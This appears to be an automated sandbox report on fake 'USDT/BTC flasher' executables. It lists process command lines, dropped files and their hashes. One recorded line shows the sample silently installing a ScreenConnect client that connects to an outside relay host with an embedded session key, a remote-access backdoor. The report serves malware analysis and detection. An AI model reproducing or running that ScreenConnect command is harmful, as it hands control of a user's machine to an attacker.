"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1868,9896316070973506943,4492347659205062296,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --use-gl=swiftshader-webgl --mojo-platform-channel-handle=4040 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1868,9896316070973506943,4492347659205062296,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --use-gl=swiftshader-webgl --mojo-platform-channel-handle=4024 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=1868,9896316070973506943,4492347659205062296,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2164 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=1868,9896316070973506943,4492347659205062296,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5032 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1868,9896316070973506943,4492347659205062296,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3472 /prefetch:8
C:\Users\Admin\AppData\Local\Temp\a\USDTFlash.exe
"C:\Users\Admin\AppData\Local\Temp\a\USDTFlash.exe"
C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\ScreenConnect\24.3.7.9067\e9736d81e38965d1\ScreenConnect.ClientSetup.msi"
C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding E7EE87381CB21AA8F6ED4A84B58BFC33 C
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\MSIF3C8.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_242349093 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments
C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 501C26F1CE30D7B554A79751F99BB4EE
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 61A8950CFA1EEDB446376A3DD14F3157 E Global\MSI0000
C:\Program Files (x86)\ScreenConnect Client (e9736d81e38965d1)\ScreenConnect.ClientService.exe
"C:\Program Files (x86)\ScreenConnect Client (e9736d81e38965d1)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=relay.vahelps.top&p=8041&s=bb212036-9f37-46ca-99ab-ac42f37709e0&k=BgIAAACkAABSU0ExAAgAAAEAAQDhaIar%2bL1KV6GFRlxD7tSQHmgDc5%2bEmz%2bwlbQzwsSBftaKd12u%2bGO%2bh%2bY2hEFVX3Zh17GjJ6Gv%2b2BSJZQ6Ml7neNCJsbKaTGZJ72D12CtD%2b5goZGgHiRpiK%2fdZvtUn2pEZ%2b02WgN%2bFlOPeEVqujt9WSSwilh45puSR3wk5Bcek%2bAJ7DSFc8w2dKB8lMB%2b9Sut13ZAuQGU54iXcCAQKW2FzC%2bdWR6rWMLyLu0Qhovk5WQMHa1gP0VO4sj6hFlzpnPKhV5otTXkkA9Se9MHQ%2fVwzc7LAXB%2fWL51gKwL1KSNJ4JEjPQI46RPKUGEgY7vXp1o49EPqOwAn04LE4Ucaq1K0&v=AQAAANCMnd8BFdERjHoAwE%2fCl%2bsBAAAAokFQDM4%2bw0%2bEzCeXG6QzxAAAAAACAAAAAAAQZgAAAAEAACAAAADgeT83M%2f34U%2bOreuKiNmlyT7Kyq4KuE%2bSS%2bF6p4KQBzAAAAAAOgAAAAAIAACAAAAAgsaSj3u4PAH11F0QJfWM2gKKseDBoObBO2KFQasP2pKAEAAABgwz8yK0DkwlI9bHqIfbQw%2fRoyvtl%2f572N%2bq3HEvBp0Gkqg0j2nBLTztxhpqFy4tMPG9Hxpp0k2b%2bxVzJXglPXJ1iZj%2f9qecbtUuIWJKr0Kjj0gNz8VyAx8Kq0z0mTle3Pg0zRGse%2f4quQCXP0boHQzcQaWJtURAkBH03sygrUGNIsvyCfBtifq9V6dJqxkhvm%2fsYzce9Qyy%2fOUcAtZMQlhyCEkGXUc1Og5H4zqkSXHBHp%2folntGNBgtV1gRQuxCkOSkUsyhrvwXc1UZ32KPZY6mzZuGjxrmmg3RJv3RuORfeVtumN2yROLKV%2bOk5FKdReXsAxIbnpqyou6AlrosWrSZy75bWU8ersca%2fuDpYNnTWsjA32lAd5zMEq3ovhveHayUIKc8XkW1LEviXT1Zr9hG5ZzTeAWWWn52HrE0%2bXSlaxReJcEH%2beQPe93J42rB56qEwLNolz%2be02KBPJewJ739UIyUrRGvjnKc5AvLKAgPgKCJRTw9sNgFyb9FUYg9XQmYnv127Kj6%2bqypY%2fsy5hDBeJaZ0DWf5WiX5aenfoJRsM%2b57ZobAATK5LWVxHbr8qMpqTmNV4wW4KoaboY3ir2l6hNVIvvv6gNLb%2b44BZKzlANcSrLPGG1jg8u1vooA59JJzaK2kwjdi%2bsw5nfDavLYYMw1i5aD8nVHzDIWruIGRHxCKjWko9aRqHmnCrpRVhzPwzE9oLt9rqCkkpusM9NzH25WPzea5tpEN58LY6rbg3RGoE5nkZQEqbzY%2fysHDPBk5BeAy5%2fUj3d8fbxhR1zOK82xQS1ug3Z4tBuL6EPV4Pq1BSZ7G41eiM%2fZeRU4X7rWgJXE9%2bKaFx42hHHBSNUpT0KEp0yW39D5EcFRZmOmx%2fUz%2bn6Uqbk31rcvcxv9esoYqejXLMXF2t%2fdC0wB7xxEEQlSDKfjNnppjxBNx%2f2DI%2bNlh3Fo64NISf1PipJTnfjrdvQZkpb6O2nXvyMsXKGDslL%2fSfUTmNksWohyvW6EdT3qWivNMXK4Lird3Kfhr9S43Tm5Nh3MO82ktGyzl6wLEBBwRsO0tru7GHhHmVRDXcNGG%2faip5BsB5sJdnFCHN6ANM5P1KvBzIFzUv87wZuSdT45ZEJNNioNCL7ujYu%2fxOEUE5ea5vDm75%2fJLCqPYG43%2bIIVm8vOo8Ok67T9QQnXg9jb34qgu8hk4tvDxOJwuEqreDwNk%2fQGXg7lPkuhcBNUKjled6V7vRJ%2fwzmL4aLKxNdOB2001NKJUglt19ma7i8zscAuxNcxlbc1GcV8EXDnmDIQTf1o1jV%2fJr54pjm6aIsShr6DWkT6DKpEpn9JDmgk48rf8l52KrkX2oPsR5nr%2f2ndnxRmOpPKvQsPgGFhg8bxu0nKJ86axiAmsIajYIHkOnPEQehXGbwztED0vvccPSbG8mcGprE7%2f1C30%2bDbQ%2fToB5Lb9ZBTkmSROa8rSHvtZ6r3WLYCVDCgZnWwRBy3COg8R5bTOfz2vh7QhmQcDodJdexmbu52%2bARaUILBf4HhTZBvHZQgfd0F4ckddVKKl2n6r9QdPu1mr803yMg29nkXOBaAzxo3gTlc0W0AAAADoFFs87XQa6Eg0H6xllB3R%2fKg89oA8YthZyXkBK2eerrxogWh7DI%2fLmir86NTUUIeDMFS9J5gczH9JN6tYaGnZ&t=FLASHUSDT"
C:\Program Files (x86)\ScreenConnect Client (e9736d81e38965d1)\ScreenConnect.WindowsClient.exe
"C:\Program Files (x86)\ScreenConnect Client (e9736d81e38965d1)\ScreenConnect.WindowsClient.exe" "RunRole" "b12c0afe-1dfe-41b1-841a-d2b5a593a6d7" "User"
C:\Users\Admin\AppData\Local\Temp\a\USDTFlash.exe
"C:\Users\Admin\AppData\Local\Temp\a\USDTFlash.exe"
C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\ScreenConnect\24.3.7.9067\e9736d81e38965d1\ScreenConnect.ClientSetup.msi"
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 8F1D51CFCAEC926228398F458DDE36A1 C
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\MSI8068.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_242385015 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding F1388A9BCDC3D64ED9DD91AC684C718E
C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{77BEDA41-7D52-4721-8930-2E1ACD91DCB9}\MicrosoftEdge_X64_133.0.3065.59.exe
"C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{77BEDA41-7D52-4721-8930-2E1ACD91DCB9}\MicrosoftEdge_X64_133.0.3065.59.exe" --msedge --verbose-logging --do-not-launch-msedge --system-level --channel=stable
C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{77BEDA41-7D52-4721-8930-2E1ACD91DCB9}\EDGEMITMP_39C84.tmp\setup.exe
"C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{77BEDA41-7D52-4721-8930-2E1ACD91DCB9}\EDGEMITMP_39C84.tmp\setup.exe" --install-archive="C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{77BEDA41-7D52-4721-8930-2E1ACD91DCB9}\MicrosoftEdge_X64_133.0.3065.59.exe" --msedge --verbose-logging --do-not-launch-msedge --system-level --channel=stable
C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{77BEDA41-7D52-4721-8930-2E1ACD91DCB9}\EDGEMITMP_39C84.tmp\setup.exe
"C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{77BEDA41-7D52-4721-8930-2E1ACD91DCB9}\EDGEMITMP_39C84.tmp\setup.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\SystemTemp\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.60 "--annotation=exe=C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{77BEDA41-7D52-4721-8930-2E1ACD91DCB9}\EDGEMITMP_39C84.tmp\setup.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.59 --initial-client-data=0x23c,0x240,0x244,0x218,0x248,0x7ff65c066a68,0x7ff65c066a74,0x7ff65c066a80
C:\Users\Admin\AppData\Local\Temp\a\main.exe
"C:\Users\Admin\AppData\Local\Temp\a\main.exe"
C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{77BEDA41-7D52-4721-8930-2E1ACD91DCB9}\EDGEMITMP_39C84.tmp\setup.exe
"C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{77BEDA41-7D52-4721-8930-2E1ACD91DCB9}\EDGEMITMP_39C84.tmp\setup.exe" --msedge --channel=stable --system-level --verbose-logging --create-shortcuts=2 --install-level=1
C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{77BEDA41-7D52-4721-8930-2E1ACD91DCB9}\EDGEMITMP_39C84.tmp\setup.exe
"C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{77BEDA41-7D52-4721-8930-2E1ACD91DCB9}\EDGEMITMP_39C84.tmp\setup.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\SystemTemp\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.60 "--annotation=exe=C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{77BEDA41-7D52-4721-8930-2E1ACD91DCB9}\EDGEMITMP_39C84.tmp\setup.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.59 --initial-client-data=0x23c,0x240,0x244,0x218,0x248,0x7ff65c066a68,0x7ff65c066a74,0x7ff65c066a80
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.59\Installer\setup.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.59\Installer\setup.exe" --msedge --channel=stable --register-package-identity --verbose-logging --system-level
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.59\Installer\setup.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.59\Installer\setup.exe" --msedge --channel=stable --remove-deprecated-packages --verbose-logging --system-level
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.59\Installer\setup.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.59\Installer\setup.exe" --msedge --channel=stable --update-game-assist-package --verbose-logging --system-level
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.59\Installer\setup.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.59\Installer\setup.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\SystemTemp\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.60 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.59\Installer\setup.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.59 --initial-client-data=0x23c,0x240,0x244,0x218,0x248,0x7ff6ad4e6a68,0x7ff6ad4e6a74,0x7ff6ad4e6a80
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.59\Installer\setup.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.59\Installer\setup.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\SystemTemp\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.60 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.59\Installer\setup.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.59 --initial-client-data=0x23c,0x240,0x244,0x218,0x248,0x7ff6ad4e6a68,0x7ff6ad4e6a74,0x7ff6ad4e6a80
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.59\Installer\setup.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.59\Installer\setup.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\SystemTemp\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.60 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.59\Installer\setup.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.59 --initial-client-data=0x23c,0x240,0x244,0x218,0x248,0x7ff6ad4e6a68,0x7ff6ad4e6a74,0x7ff6ad4e6a80
Network
Files
C:\Users\Admin\AppData\Local\Temp\a\BTC-Flasher.exe
| MD5 | 4c9e0721e37503107c9fa2a53fecd716 |
| SHA1 | 582baf51669d7cd17fabc3e724530b23de32d312 |
| SHA256 | 21562797103d497b3f17defd8cde542197089e5adfef9cfe73957eec1b8de565 |
| SHA512 | e4f752f244956ece9f674cd6fb8c660ea2b4f79ff0871d85a2547ffb31fb6d0a4c982e9594fea94ec267003bb7539975c5af3da2643ca40856747f1bb2d02bcb |
C:\Config.Msi\e61bc0b.rbs
| MD5 | e34190ddb4950e4a4d7511d464e810d6 |
| SHA1 | 4d7c3b9af84841aaf2546b7da1f44182dca6af97 |
| SHA256 | 1999a57d75eceffa77e77f65582adf164fefa9e5086795e1141cf064f99ec52d |
| SHA512 | 64f98f9abb5c15491474842a4ceac274aa71e8fa3cd783a78969e70cb6aa06f954067aae8dc12d12c3a158710c36e02d1a172c691561403946d8d8b423cc5fc1 |
C:\Config.Msi\e61bc1d.rbs
| MD5 | 4d21c754798d330f1e780fc870787774 |
| SHA1 | 8ad355e49cbcad3b79e1f4a3064b27c3732f3dc2 |
| SHA256 | 147380d525349ba805f360825c93822d2eaddb1edbaaa69c54ef91f426bbf83b |
| SHA512 | afe3cef8e693e05230b08884f49a8301524e90eea77b5b316498840c8bc8e29c2887576cd8ebe62237244b9b6f8d0d163d17697dcd59ea285e022e6f4c08a63b |
C:\Users\Admin\AppData\Local\Temp\MSICF57.tmp-\Microsoft.Deployment.WindowsInstaller.Package.dll
| MD5 | a921a2b83b98f02d003d9139fa6ba3d8 |
| SHA1 | 33d67e11ad96f148fd1bfd4497b4a764d6365867 |
| SHA256 | 548c551f6ebc5d829158a1e9ad1948d301d7c921906c3d8d6b6d69925fc624a1 |
| SHA512 | e1d7556daf571c009fe52d6ffe3d6b79923daeea39d754ddf6beafa85d7a61f3db42dfc24d4667e35c4593f4ed6266f4099b393efa426fa29a72108a0eaedd3e |
C:\Users\Admin\AppData\Local\Temp\MSICF57.tmp-\Microsoft.Deployment.Compression.Cab.dll
| MD5 | 77be59b3ddef06f08caa53f0911608a5 |
| SHA1 | a3b20667c714e88cc11e845975cd6a3d6410e700 |
| SHA256 | 9d32032109ffc217b7dc49390bd01a067a49883843459356ebfb4d29ba696bf8 |
| SHA512 | c718c1afa95146b89fc5674574f41d994537af21a388335a38606aec24d6a222cbce3e6d971dfe04d86398e607815df63a54da2bb96ccf80b4f52072347e1ce6 |
C:\Users\Admin\AppData\Local\Temp\MSICF57.tmp-\Microsoft.Deployment.Compression.dll
| MD5 | 4717bcc62eb45d12ffbed3a35ba20e25 |
| SHA1 | da6324a2965c93b70fc9783a44f869a934a9caf7 |
| SHA256 | e04de7988a2a39931831977fa22d2a4c39cf3f70211b77b618cae9243170f1a7 |
| SHA512 | bb0abc59104435171e27830e094eae6781d2826ed2fc9009c8779d2ca9399e38edb1ec6a10c1676a5af0f7cacfb3f39ac2b45e61be2c6a8fe0edb1af63a739ca |
C:\Config.Msi\e61bc1f.rbs
| MD5 | 89dac159850c745923092c97ae9bbcd8 |
| SHA1 | 26538f30332978441872b9dbe952e55aebdb0ec5 |
| SHA256 | e1da5782ab35772c1601c04c83b9947f3a47c0518242ed17e1154f230e9121ea |
| SHA512 | 2da669d2b3ac17472c9d0bd240760b0a8deb47cb1098dab5a5e039823655139ce08187cc47450e9a1debf38187fef2ecd98a106be20a77ddf82210788d21fbe6 |
C:\Config.Msi\e61bc23.rbs
| MD5 | 4b4f009ca3bf6b1ef85edc22d8d6d36d |
| SHA1 | 15a754da0aff7a8088916873bd040260b130bf09 |
| SHA256 | 5cdc1f976a01ec8311871e3a4c6de4c897bb022a7dd077aeaf007cb4f35c0914 |
| SHA512 | ff5c77d8ee1cbd44944086f2f4b4a2477853c098aa8878d1647f91180a1217d20dd14cde7a6104165612f8d2e5f5e3adfa6973397210a1541e322c6debe31f67 |
C:\Config.Msi\e61bc35.rbs
| MD5 | f79920d2d8e3a78f41d9d2149cec8270 |
| SHA1 | f46181dc1235657e8b5a95894e021e1fdd00994a |
| SHA256 | c989cc33e3fd1f3bd979ee68b03580e4a25ae1779ca8eb3312a88a7fa6583cd4 |
| SHA512 | 961185fbcb218ff47cf7e3db9d38066cae1b774d22e1aa88048de9840ed7aae536a57a9e5633648c08dff8e12ad7117198b2894da5b72102570cd5cf393d99db |
memory/4768-640-0x000001E1D0D60000-0x000001E1D0D6A000-memory.dmp
memory/4768-641-0x000001E1D0D90000-0x000001E1D0D98000-memory.dmp
memory/4768-639-0x000001E1D0810000-0x000001E1D083C000-memory.dmp
memory/4768-643-0x000001E1EC400000-0x000001E1EC4A8000-memory.dmp
memory/4768-644-0x000001E1EAE90000-0x000001E1EAEB2000-memory.dmp
memory/4768-645-0x000001E1EAE60000-0x000001E1EAE74000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\a\pothjasefdj.exe
| MD5 | c6ddc5c9dad56fd85bf6199b38c09120 |
| SHA1 | 299bc508a4c1a603789b7c5aa166713b3428f2e0 |
| SHA256 | d0ebe35a902832fbd856e5a03d770c5cf1d7ba9c9418a51bda6d9b0698771841 |
| SHA512 | 41668f9c2231769aa8c919166b964d0161b2cde4c0efd175b5f3bdb25906496ed045366fb1c25439663e98f483f43bc4e56fa4891abd3cd5abb3bbbfdcf69e40 |
memory/2356-657-0x0000000000400000-0x0000000000422000-memory.dmp
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports
| MD5 | d751713988987e9331980363e24189ce |
| SHA1 | 97d170e1550eee4afc0af065b78cda302a97674c |
| SHA256 | 4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945 |
| SHA512 | b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | d24eb2a9140d14bea6ab2e3618d4ad51 |
| SHA1 | 9839c06696255719a27823f0456e190a61b0d836 |
| SHA256 | 76f12449d962e2a9edb79b87dc952b63996e175c56876e82d8b278f1ca4a967b |
| SHA512 | eb9b1ccb8ec4555575b1bb30067f7e7ebac792853595d201d1277722f139828fb780cbdf2a6230411c59d5782b01990c359ff62f24a8857387f292c30cc802f5 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | c0521de85014ffb439beaef46a04d57a |
| SHA1 | e4030babf5f4ebebce667e1bdfa5930a01ac96bb |
| SHA256 | 5ff0c55032b921b8de62351bac8575b4db7e03594e0e478055f2f5db8a8651e2 |
| SHA512 | fab681972a0667cb0edb14dec55154e42d242cb92e4f84ceebbd970cae1777e3c57ab55b1913b0e652f87f02aeffe9f14c918727b31588e49860840c95f0e9ea |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | bacea279f54fcc511936d06297e3832b |
| SHA1 | a64d80fe6e611b601cd718866d82d06303ed8476 |
| SHA256 | fd003845711559e5b86c5df5dd90f1add3a53fe6b386c5e5bdbfbd6465a04755 |
| SHA512 | a3342af65ecbd5e500e15d05c7ad368e9ea9077cf8221f1637a2835adae8f27c9eba382649c50985c0043c902789d056ad4ff72ea76c4d3d4d4e745e8ddbca63 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\ShaderCache\GPUCache\data_1
| MD5 | f50f89a0a91564d0b8a211f8921aa7de |
| SHA1 | 112403a17dd69d5b9018b8cede023cb3b54eab7d |
| SHA256 | b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec |
| SHA512 | bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58 |
C:\Config.Msi\e71f62c.rbs
| MD5 | c000f39d56eb350c9c66d3146d6c0375 |
| SHA1 | 6cc04b0915084abe87177fc73c3d4ff1195f9643 |
| SHA256 | ee65e24be612d3bbf84b6311c751f1685f644534222edf7c5af701fbeb2410c4 |
| SHA512 | a89adafcf8a9791723b4930e521a0f7c23e9e25369d3a6738f22913e3e43f63a1a2ad2ac1c2848bbbd8f1e941f25f6eefca3b6d032dec64f748cd1724bd5288d |
C:\Config.Msi\e71f63e.rbs
| MD5 | 9a7128d070a655b58558b0471f51548a |
| SHA1 | 6f3f684c456c5c221d943c4675cff10e5b5871fc |
| SHA256 | 190d0def9ddf074d6d325827b0180c5aa1e7708cc342da9ab8d9e132148ca7da |
| SHA512 | 076d822b38147a3451c39264bfe154203ab46a847f7be3f1d6e045701689a0831676c49316c2c494a2e7347bd8cc0c1430856a01cb0f94a6eb749f4350457b91 |
C:\Config.Msi\e71f640.rbs
| MD5 | 244989019b77282995f7076013469393 |
| SHA1 | dc42117b8d02a8e124493267a3dc440b8c5cef1a |
| SHA256 | 810c0dc41501065648203b4192267eefdd44f9e460df0b05a169051a57e14088 |
| SHA512 | e12197a73439d0e3b2060e9bde8cdcd995a6f56cca59e2aaaaf20c6b23df98e6d408444539a11a4d38e7dffe1d688c7a8169ec3167ceea5f34f4ba128f044acb |
memory/2356-926-0x0000000000400000-0x0000000000422000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\a\main.exe
| MD5 | c1ab7781370290e0f7d8ea98705e8c84 |
| SHA1 | bf2cc6fe244d17f05d0185d17758fd726562afee |
| SHA256 | 17bc5b41b35d894b37224e5daa66e2c7326e10a8309e299af122c6602afc953e |
| SHA512 | f28465ca2cad0c3476a867acad8f2d530fcddf8aaa83f5003566781e727846192a5519fce89d597d20b9291e8b462f4c34124ce6cfca95387b7547368892f37f |
memory/3268-944-0x0000000000210000-0x00000000006A3000-memory.dmp
memory/3268-946-0x0000000000210000-0x00000000006A3000-memory.dmp
C:\Program Files (x86)\Microsoft\EdgeCore\133.0.3065.59\Installer\setup.exe
| MD5 | 1b3e9c59f9c7a134ec630ada1eb76a39 |
| SHA1 | a7e831d392e99f3d37847dcc561dd2e017065439 |
| SHA256 | ce78ccfb0c9cdb06ea61116bc57e50690650b6b5cf37c1aebfb30c19458ee4ae |
| SHA512 | c0e50410dc92d80ff7bc854907774fc551564e078a8d38ca6421f15cea50282c25efac4f357b52b066c4371f9b8d4900fa8122dd80ab06ecbd851c6e049f7a3e |